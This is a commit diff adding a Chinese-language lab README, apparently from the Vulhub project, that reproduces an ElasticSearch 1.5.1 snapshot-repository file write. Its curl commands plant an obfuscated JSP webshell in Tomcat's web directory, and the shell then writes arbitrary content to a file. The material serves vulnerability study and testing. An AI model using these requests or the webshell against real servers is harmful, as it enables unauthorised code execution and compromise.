first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

View File

@@ -0,0 +1,67 @@
# ElasticSearch 任意文件上传漏洞WooYun-2015-110216
ElasticSearch是一个分布式的RESTful搜索和分析引擎。
ElasticSearch的备份功能中存在一个漏洞攻击者可以利用该漏洞向文件系统写入任意文件当与其他Web服务结合时可能导致WebShell上传。
ElasticSearch具有数据备份功能允许用户指定一个路径来存储备份数据。这个路径和文件名都可以由用户控制。如果系统上同时运行着其他Web服务如Tomcat、PHP等攻击者可以利用ElasticSearch的备份功能向Web可访问目录写入WebShell。
与[CVE-2015-5531](../CVE-2015-5531/)类似该漏洞与备份仓库功能有关。在ElasticSearch 1.5.1版本之后,备份仓库的根路径被限制在`path.repo`配置选项中。如果管理员未配置此选项备份功能将默认禁用。即使配置了该选项只有当Web根目录位于配置目录内时才能写入WebShell。
参考链接:
- <http://cb.drops.wiki/bugs/wooyun-2015-0110216.html>
## 环境搭建
执行以下命令启动一个ElasticSearch 1.5.1版本的服务器同时一个Tomcat也运行在同一容器中
```
docker compose up -d
```
Tomcat安装在`/usr/local/tomcat`目录其Web目录位于`/usr/local/tomcat/webapps`。ElasticSearch安装在`/usr/share/elasticsearch`目录。
## 漏洞复现
我们的目标是利用ElasticSearch在`/usr/local/tomcat/webapps`目录下写入WebShell。
首先,创建一个恶意的索引文档:
```
curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'
```
然后创建一个恶意的仓库。其中`location`的值是我们要写入文件的路径。
> 注意仓库路径的特点在于它可以写入任何可访问的位置如果路径不存在会自动创建。这意味着你可以通过文件访问协议创建任意文件夹。这里我们将路径指向Tomcat的Web部署目录因为Tomcat会自动为该目录下创建的文件夹创建新的应用如果文件名为wwwroot创建的应用名称就是wwwroot
```
curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps/wwwroot/",
"compress": false
}
}'
```
验证并创建仓库:
```
curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{
"indices": "yz.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}'
```
完成!
访问`http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp`即可找到我们上传的WebShell。
这个Shell允许向wwwroot目录下的test.jsp文件写入任意字符串。例如`http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success`。然后访问/wwwroot/test.jsp就能看到"success"
![](1.png)